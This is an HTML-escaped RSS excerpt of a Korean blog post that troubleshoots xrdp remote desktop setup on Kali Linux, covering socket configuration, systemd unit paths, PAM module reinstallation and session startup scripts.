&lt;p data-ke-size=&quot;size16&quot;&gt;구성파일 수정&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;/etc/xrdp/sesman.ini&lt;/code&gt;&lt;/b&gt;&lt;/span&gt; 파일 수정&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667754406&quot; class=&quot;routeros&quot; style=&quot;background-color: #f8f8f8; color: #383a42; text-align: start;&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;[SessionManager] ListenAddress=sesman.socket&lt;/code&gt;&lt;/pre&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;/etc/xrdp/xrdp.ini&lt;/code&gt;&lt;/b&gt;&lt;/span&gt; 파일 수정&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667744182&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;[globals]
sesman_socket=sesman.socket&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;systemd 서비스 파일 조정&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;code&gt;/usr/lib/systemd/system/xrdp-sesman.server&lt;/code&gt; 파일 수정&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667694829&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;[Unit]
Requires=xrdp-sesman.socket

[Socket]
ListenStream=/run/xrdp/sesman.socket&lt;/code&gt;&lt;/pre&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;방화벽 및 소켓 권한 확인&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667726289&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;sudo chmod 770 /run/xrdp/sesman.socket
sudo systemctl restart xrdp xrdp-sesman&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;만일 &lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;sesman.socket&lt;/code&gt;&lt;/b&gt;&lt;/span&gt; 파일이 서버에 존재하지 않는 경우 (xrdp-sesman.service 파일은 있으나 &lt;span style=&quot;background-color: #dddddd; color: #ee2323;&quot;&gt;&lt;b&gt;&lt;code&gt;xrdp-sesman.socket&lt;/code&gt;&lt;/b&gt;&lt;/span&gt; 파일이 존재하지 않는경우)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;lib/systemd/system/xrdp-sesman.socket&lt;/code&gt;&lt;/b&gt;&lt;/span&gt; 파일 생성 (수동 socket 파일 생성)&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;code class=&quot;language-bash&quot;&gt; [Unit]
 Description=XRDP Session Manager Socket

 [Socket]
 ListenStream=/run/xrdp/sesman.socket
 SocketMode=0660

 [Install]
 WantedBy=sockets.target&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667666219&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;[Unit]
Description=XRDP Session Manager Socket

[Socket]
ListenStream=/run/xrdp/sesman.socket
SocketMode=0660

[Install]
WantedBy=sockets.target&lt;/code&gt;&lt;/pre&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;런타임 디렉토리 권한 설정&lt;/li&gt;
&lt;li&gt;본인의 경우, XRDP 시스템 계정이 존재하지 않아 진행하지 않았고, chmod 로 권한만 설정하였다.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667647432&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;sudo mkdir -p /run/xrdp
sudo chown xrdp:xrdp /run/xrdp
sudo chmod 0755 /run/xrdp&lt;/code&gt;&lt;/pre&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;서비스 파일 검증 (&lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;/lib/systemd/system/xrdp-sesman.service&lt;/b&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;파일 확인)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667615248&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;[Unit]
Requires=xrdp-sesman.socket

[Service]
ExecStart=/usr/sbin/xrdp-sesman&lt;/code&gt;&lt;/pre&gt;
&lt;ul style=&quot;list-style-type: circle;&quot; data-ke-list-type=&quot;circle&quot;&gt;
&lt;li&gt;systemd 재구성&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667604154&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;sudo systemctl daemon-reload
sudo systemctl enable --now xrdp-sesman.socket&lt;/code&gt;&lt;/pre&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;Server Error:&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;xrdp-sesman.service: Unable to locate executable '/usr/sbin/xrdp-sesman': No such file or directory&lt;br /&gt;xrdp-sesman.service: Failed at step EXEC spawning /usr/sbin/xrdp-sesman: No such file or directory&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;xrdp-sesman 파일 위치가 잘못되어 도출되는 에러다. 본 에러는 다음 순서로 확인이 가능하다.&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;실행 파일 실제 위치 확인&lt;/li&gt;
&lt;/ol&gt;
&lt;pre id=&quot;code_1746667359559&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;# xrdp-sesman 바이너리 검색
whereis xrdp-sesman | grep bin&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;확인 후, 해당 위치에서 확인된 디렉토리 정보로 systemd 서비스 파일 수정 (실제 경로로)하여 해결할 수 있다.&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;&lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;/lib/systemd/system/xrdp.service&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;, &lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;/lib/systemd/system/sxrdp-sesman.service&lt;/code&gt;&lt;/b&gt;&lt;/span&gt; 파일 수정&lt;/li&gt;
&lt;/ol&gt;
&lt;pre id=&quot;code_1746667589844&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt; # xrdp-sesman.service
 [Service]
 ExecStart=/usr/local/sbin/xrdp-sesman  # 기존 /usr/sbin/xrdp-sesman &amp;rarr; /usr/local/sbin/xrdp-sesman
 ExecStop=/usr/local/sbin/xrdp-sesman --kill&lt;/code&gt;&lt;/pre&gt;
&lt;pre id=&quot;code_1746667433369&quot; class=&quot;awk&quot; style=&quot;background-color: #f8f8f8; color: #383a42; text-align: start;&quot; data-ke-type=&quot;codeblock&quot; data-ke-language=&quot;bash&quot;&gt;&lt;code&gt;# xrdp.service
[Service] ExecStart=/usr/local/sbin/xrdp
# 기존 /usr/sbin/xrdp &amp;rarr; /usr/local/sbin/xrdp
ExecStop=/usr/local/sbin/xrdp --kill&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;수정 사항 적용&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667470818&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;sudo systemctl daemon-reload sudo systemctl restart xrdp xrdp-sesman&lt;/code&gt;&lt;/pre&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;Client Error:&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;login was successful - creating session&lt;br /&gt;sending create session request to session manager. Please~~ it...&lt;br /&gt;Can't create session for user [&lt;i&gt;User Name&lt;/i&gt; ] - Session failed immediately.&lt;br /&gt;Server Error:&lt;br /&gt;[INFO ] Received request from xrdp to create a session for user [ &lt;i&gt;User Name&lt;/i&gt; ]&lt;br /&gt;pam_unix(xrdp-sesman:session): session opened for user &lt;a href=&quot;uid=1000&quot;&gt; &lt;i&gt;User Name&lt;/i&gt; &lt;/a&gt; by &lt;a href=&quot;uid=0&quot;&gt; &lt;i&gt;User Name&lt;/i&gt; &lt;/a&gt;&lt;br /&gt;gkr-pam: unlocked login keyring&lt;br /&gt;[INFO ] sesman: Session on display :10 has finished.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;본 에러의 경우, PAM 모듈이 누락되어 발생한 문제로 패키지에 대한 재설치가 요구된다.&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;code&gt;pam_lastlog.so&lt;/code&gt; 파일 재설치&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667483703&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;sudo apt install --reinstall libpam-modules&lt;/code&gt;&lt;/pre&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;GNNOME 키링 데몬 구성 수정&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/etc/pam.d/xrdp-sesman&lt;/code&gt; 파일 내 내용 추가 (세션 섹션 하단 라인 추가)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667509766&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;session optional pam_gnome_keyring.so auto_start&lt;/code&gt;&lt;/pre&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;XRDP 데스크톱 환경 설정&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;code&gt;/etc/xrdp/startwm.sh&lt;/code&gt; 파일 수정 (추가)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667543093&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;#!/bin/sh
unset DBUS_SESSION_BUS_ADDRESS exec /usr/bin/xfce4-session # 사용 중인 DE에 맞게 변경&lt;/code&gt;&lt;/pre&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;사용자 그룹 재확인&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667556724&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;sudo usermod -aG ssl-cert,tsusers kai_ht&lt;/code&gt;&lt;/pre&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;시스템 로그 확인/분석 (선택)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre id=&quot;code_1746667565701&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;journalctl -u xrdp -u xrdp-sesman --since &quot;10 minutes ago&quot; | grep -iE 'error|fail'&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이후 xrdp 서비스를 재시작해주면 정상 접근이 가능하다.&lt;/p&gt;
&lt;pre class=&quot;ebnf&quot;&gt;&lt;code&gt;sudo systemctl restart xrdp xrdp-sesman&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Tools/Kali</category>
      <category>kali linux rdp</category>
      <category>kali rdp</category>
      <category>kali xrdp</category>
      <category>linux rdp</category>
      <category>리눅스 rdp</category>
      <category>리눅스 xrdp</category>
      <category>리눅스 원격</category>
      <category>칼리 rdp</category>
      <category>칼리 원격</category>
      <author>Kai_HT</author>
      <guid isPermaLink="true">https://kaisec.tistory.com/76</guid>
      <comments>https://kaisec.tistory.com/entry/RDP-GUI-Connection#entry76comment</comments>
      <pubDate>Thu, 8 May 2025 10:29:32 +0900</pubDate>
    </item>
  </channel>
</rss>